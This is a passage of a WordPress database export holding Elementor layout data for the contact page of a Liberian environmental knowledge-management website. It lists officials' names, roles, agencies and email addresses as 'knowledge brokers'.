\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24555,3625,'_elementor_edit_mode','builder'),(24556,3625,'_elementor_template_type','wp-page'),(24557,3625,'_elementor_version','3.0.16'),(24558,3625,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (24559,3625,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a 